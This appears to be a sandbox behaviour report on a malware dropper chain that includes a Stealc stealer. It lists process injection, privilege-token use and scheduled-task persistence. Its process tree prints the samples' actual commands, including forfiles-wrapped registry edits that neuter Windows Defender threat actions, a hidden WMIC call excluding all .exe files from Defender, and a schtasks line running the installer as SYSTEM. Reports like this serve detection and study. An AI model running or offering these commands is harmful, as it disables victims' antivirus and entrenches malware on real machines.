\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3232 schtasks.exe 2168 schtasks.exe 3880 schtasks.exe 3248 schtasks.exe 2876 schtasks.exe 4740 schtasks.exe 1020 schtasks.exe 4224 schtasks.exe 644 schtasks.exe 3240 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4428 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe 4428 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe 2252 axplong.exe 2252 axplong.exe 3688 stealc_default.exe 3688 stealc_default.exe 2432 RegAsm.exe 2224 c26v2TJg1I.exe 4820 HmP7CLDlaU.exe 3688 stealc_default.exe 3688 stealc_default.exe 2432 RegAsm.exe 2432 RegAsm.exe 2432 RegAsm.exe 2432 RegAsm.exe 4832 powershell.exe 4832 powershell.exe 4832 powershell.exe 1588 axplong.exe 1588 axplong.exe 3696 powershell.exe 2752 06082025.exe 2752 06082025.exe 2752 06082025.exe 2752 06082025.exe 3696 powershell.exe 2752 06082025.exe 3896 axplong.exe 3896 axplong.exe 4520 powershell.exe 4520 powershell.exe 5012 powershell.exe 5012 powershell.exe 2744 powershell.exe 2744 powershell.exe 2244 powershell.EXE 2244 powershell.EXE 2132 powershell.exe 2132 powershell.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 3864 powershell.exe 3864 powershell.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe 4432 FkNsISq.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4820 HmP7CLDlaU.exe Token: SeDebugPrivilege 2224 c26v2TJg1I.exe Token: SeBackupPrivilege 4820 HmP7CLDlaU.exe Token: SeBackupPrivilege 2224 c26v2TJg1I.exe Token: SeSecurityPrivilege 4820 HmP7CLDlaU.exe Token: SeSecurityPrivilege 2224 c26v2TJg1I.exe Token: SeSecurityPrivilege 2224 c26v2TJg1I.exe Token: SeSecurityPrivilege 4820 HmP7CLDlaU.exe Token: SeSecurityPrivilege 2224 c26v2TJg1I.exe Token: SeSecurityPrivilege 4820 HmP7CLDlaU.exe Token: SeSecurityPrivilege 2224 c26v2TJg1I.exe Token: SeSecurityPrivilege 4820 HmP7CLDlaU.exe Token: SeDebugPrivilege 2432 RegAsm.exe Token: SeDebugPrivilege 3700 msbuild.exe Token: SeDebugPrivilege 4832 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 4528 WMIC.exe Token: SeSecurityPrivilege 4528 WMIC.exe Token: SeTakeOwnershipPrivilege 4528 WMIC.exe Token: SeLoadDriverPrivilege 4528 WMIC.exe Token: SeSystemProfilePrivilege 4528 WMIC.exe Token: SeSystemtimePrivilege 4528 WMIC.exe Token: SeProfSingleProcessPrivilege 4528 WMIC.exe Token: SeIncBasePriorityPrivilege 4528 WMIC.exe Token: SeCreatePagefilePrivilege 4528 WMIC.exe Token: SeBackupPrivilege 4528 WMIC.exe Token: SeRestorePrivilege 4528 WMIC.exe Token: SeShutdownPrivilege 4528 WMIC.exe Token: SeDebugPrivilege 4528 WMIC.exe Token: SeSystemEnvironmentPrivilege 4528 WMIC.exe Token: SeRemoteShutdownPrivilege 4528 WMIC.exe Token: SeUndockPrivilege 4528 WMIC.exe Token: SeManageVolumePrivilege 4528 WMIC.exe Token: 33 4528 WMIC.exe Token: 34 4528 WMIC.exe Token: 35 4528 WMIC.exe Token: 36 4528 WMIC.exe Token: SeIncreaseQuotaPrivilege 4528 WMIC.exe Token: SeSecurityPrivilege 4528 WMIC.exe Token: SeTakeOwnershipPrivilege 4528 WMIC.exe Token: SeLoadDriverPrivilege 4528 WMIC.exe Token: SeSystemProfilePrivilege 4528 WMIC.exe Token: SeSystemtimePrivilege 4528 WMIC.exe Token: SeProfSingleProcessPrivilege 4528 WMIC.exe Token: SeIncBasePriorityPrivilege 4528 WMIC.exe Token: SeCreatePagefilePrivilege 4528 WMIC.exe Token: SeBackupPrivilege 4528 WMIC.exe Token: SeRestorePrivilege 4528 WMIC.exe Token: SeShutdownPrivilege 4528 WMIC.exe Token: SeDebugPrivilege 4528 WMIC.exe Token: SeSystemEnvironmentPrivilege 4528 WMIC.exe Token: SeRemoteShutdownPrivilege 4528 WMIC.exe Token: SeUndockPrivilege 4528 WMIC.exe Token: SeManageVolumePrivilege 4528 WMIC.exe Token: 33 4528 WMIC.exe Token: 34 4528 WMIC.exe Token: 35 4528 WMIC.exe Token: 36 4528 WMIC.exe Token: SeDebugPrivilege 2752 06082025.exe Token: SeDebugPrivilege 4520 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2244 powershell.EXE Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4428 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4428 wrote to memory of 2252 4428 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe 78 PID 4428 wrote to memory of 2252 4428 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe 78 PID 4428 wrote to memory of 2252 4428 2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe 78 PID 2252 wrote to memory of 3700 2252 axplong.exe 79 PID 2252 wrote to memory of 3700 2252 axplong.exe 79 PID 2252 wrote to memory of 3700 2252 axplong.exe 79 PID 3700 wrote to memory of 4436 3700 GOLD.exe 81 PID 3700 wrote to memory of 4436 3700 GOLD.exe 81 PID 3700 wrote to memory of 4436 3700 GOLD.exe 81 PID 3700 wrote to memory of 4180 3700 GOLD.exe 82 PID 3700 wrote to memory of 4180 3700 GOLD.exe 82 PID 3700 wrote to memory of 4180 3700 GOLD.exe 82 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 3700 wrote to memory of 2432 3700 GOLD.exe 83 PID 2252 wrote to memory of 2232 2252 axplong.exe 84 PID 2252 wrote to memory of 2232 2252 axplong.exe 84 PID 2252 wrote to memory of 2232 2252 axplong.exe 84 PID 2252 wrote to memory of 1364 2252 axplong.exe 86 PID 2252 wrote to memory of 1364 2252 axplong.exe 86 PID 2252 wrote to memory of 1364 2252 axplong.exe 86 PID 1364 wrote to memory of 3348 1364 newalp.exe 87 PID 1364 wrote to memory of 3348 1364 newalp.exe 87 PID 1364 wrote to memory of 3348 1364 newalp.exe 87 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 2232 wrote to memory of 1888 2232 crypteda.exe 88 PID 1888 wrote to memory of 4820 1888 RegAsm.exe 89 PID 1888 wrote to memory of 4820 1888 RegAsm.exe 89 PID 1888 wrote to memory of 4820 1888 RegAsm.exe 89 PID 1888 wrote to memory of 2224 1888 RegAsm.exe 91 PID 1888 wrote to memory of 2224 1888 RegAsm.exe 91 PID 1888 wrote to memory of 2224 1888 RegAsm.exe 91 PID 2252 wrote to memory of 2752 2252 axplong.exe 93 PID 2252 wrote to memory of 2752 2252 axplong.exe 93 PID 2252 wrote to memory of 2752 2252 axplong.exe 93 PID 2252 wrote to memory of 3688 2252 axplong.exe 94 PID 2252 wrote to memory of 3688 2252 axplong.exe 94 PID 2252 wrote to memory of 3688 2252 axplong.exe 94 PID 2252 wrote to memory of 4012 2252 axplong.exe 96 PID 2252 wrote to memory of 4012 2252 axplong.exe 96 PID 4012 wrote to memory of 2044 4012 umrfile%20.exe 98 PID 4012 wrote to memory of 2044 4012 umrfile%20.exe 98 PID 4012 wrote to memory of 2044 4012 umrfile%20.exe 98 PID 4012 wrote to memory of 2044 4012 umrfile%20.exe 98 PID 4012 wrote to memory of 3700 4012 umrfile%20.exe 99 PID 4012 wrote to memory of 3700 4012 umrfile%20.exe 99 PID 4012 wrote to memory of 3700 4012 umrfile%20.exe 99 PID 4012 wrote to memory of 3700 4012 umrfile%20.exe 99 PID 4012 wrote to memory of 3700 4012 umrfile%20.exe 99 PID 4012 wrote to memory of 3700 4012 umrfile%20.exe 99 PID 4012 wrote to memory of 3700 4012 umrfile%20.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe"C:\Users\Admin\AppData\Local\Temp\2efc4b80fdb9b66eabf08e3507c5587cb468ed423fd084c5825cfaae05c2fca8.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4436
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\AppData\Roaming\HmP7CLDlaU.exe"C:\Users\Admin\AppData\Roaming\HmP7CLDlaU.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
C:\Users\Admin\AppData\Roaming\c26v2TJg1I.exe"C:\Users\Admin\AppData\Roaming\c26v2TJg1I.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"4⤵
- Executes dropped EXE
PID:3348
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3688
-
-
C:\Users\Admin\AppData\Local\Temp\1000069001\umrfile%20.exe"C:\Users\Admin\AppData\Local\Temp\1000069001\umrfile%20.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"4⤵PID:2044
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3700 -
C:\Users\Admin\Pictures\8KqekEVuYzbYRyGlJGfRzbRe.exe"C:\Users\Admin\Pictures\8KqekEVuYzbYRyGlJGfRzbRe.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\7zSB6AD.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2780 -
C:\Users\Admin\AppData\Local\Temp\7zSBD06.tmp\Install.exe.\Install.exe /chnsTdidx "385104" /S7⤵
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵PID:4596
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:1284 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:4876
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:496 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:4120
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:3856
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
PID:4688 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:3216
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵
- System Location Discovery: System Language Discovery
PID:3916
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4428 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵PID:4816
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:3284
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3120 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- System Location Discovery: System Language Discovery
PID:2216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵
- System Location Discovery: System Language Discovery
PID:5020
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1512 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- System Location Discovery: System Language Discovery
PID:484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvobQgTgLADiTwblyc" /SC once /ST 08:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBD06.tmp\Install.exe\" Sj /wJMdidHem 385104 /S" /V1 /F8⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 10088⤵
- Program crash
PID:1604
-
-
-
-
-
C:\Users\Admin\Pictures\Tek7hdlMKZxKFpJqZ1QkZduR.exe"C:\Users\Admin\Pictures\Tek7hdlMKZxKFpJqZ1QkZduR.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2396
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1588
-
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe1⤵
- Executes dropped EXE
PID:4044
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\7zSBD06.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSBD06.tmp\Install.exe Sj /wJMdidHem 385104 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:780
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3260 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:4744
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:4752
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1060 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2004
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:5004
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:3672
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3308
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:836 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:4500
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2968
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:4580 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:2280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4520 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:2756
-
-
-
-
-
-
